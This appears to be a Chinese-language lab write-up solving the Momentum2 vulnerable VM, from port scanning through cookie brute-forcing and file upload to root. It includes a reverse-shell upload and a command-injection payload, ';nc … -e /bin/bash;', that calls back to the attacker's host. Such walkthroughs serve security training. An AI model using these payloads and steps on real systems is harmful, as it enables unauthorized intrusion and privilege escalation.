1.netdiscover
扫了半天扫不到,后来dl告诉说虚拟机配置有问题,参考
https://blog.csdn.net/qq_45290991/article/details/114189156
然后顺利扫到ip
2.masscan
masscan --rate=10000 --ports 0-65535 192.168.131.133
3.nmap
nmap -A 192.168.131.133
尝试目录扫描
dirb,御剑等扫描无结果
gobuster dir -u http://192.168.131.133/ -x html,php,bak,txt --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
使用gobuster扫描
进入dashboard.html
发现是一个文件上传网页
-----------------------------之前没做完,接下来继续做-----------------------------------
还扫到一个ajax.php
,没东西;试试ajax.php.bak
//The boss told me to add one more Upper Case letter at the end of the cookie
if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){
//[+] Add if $_POST['secure'] == 'val1d'
$valid_ext = array("pdf","php","txt");
}
else{
$valid_ext = array("txt");
}
// Remember success upload returns 1
内容是需要在cookie最后再添加一个大写字母。如果是admin,并且cookie也正确,还需post一个参数secure并设置为val1d,就可以上传pdf,php,txt类型的文件,否则只能上传txt文件。
那么思路就很清晰了,上传一个反弹shell脚本,在这之前我们需要用burp爆破出cookie的最后一位
记得还要post参数
最终发现只有R的Response为1,其他都为0,那么最后一位应该是R
我们修改后发包
可以看到已经成功上传,接下来监听本地端口,再访问该脚本
反弹成功
在home/athena
下发现user.txt,拿到第一个flag
同一目录下面还有password-reminder.txt
password : myvulnerableapp[Asterisk]
由此我们得到:
用户名:athena
密码:myvulnerableapp* (Asterisk是*的意思)
尝试ssh登录
ssh [email protected]
查看用户具有的sudo权限,sudo -l
athena@momentum2:~$ sudo -l
Matching Defaults entries for athena on momentum2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User athena may run the following commands on momentum2:
(root) NOPASSWD: /usr/bin/python3 /home/team-tasks/cookie-gen.py
查看cookie-gen.py
import random
import os
import subprocess
print('~ Random Cookie Generation ~')
print('[!] for security reasons we keep logs about cookie seeds.')
chars = '@#$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh'
seed = input("Enter the seed : ")
random.seed = seed
cookie = ''
for c in range(20):
cookie += random.choice(chars)
print(cookie)
cmd = "echo %s >> log.txt" % seed
subprocess.Popen(cmd, shell=True)
运行后会要输入seed的值,这个值会echo到log.txt文件中,并且会执行bash命令,可以直接反弹shell
构造:
;nc 192.168.131.129 1234 -e /bin/bash;
成功获得root权限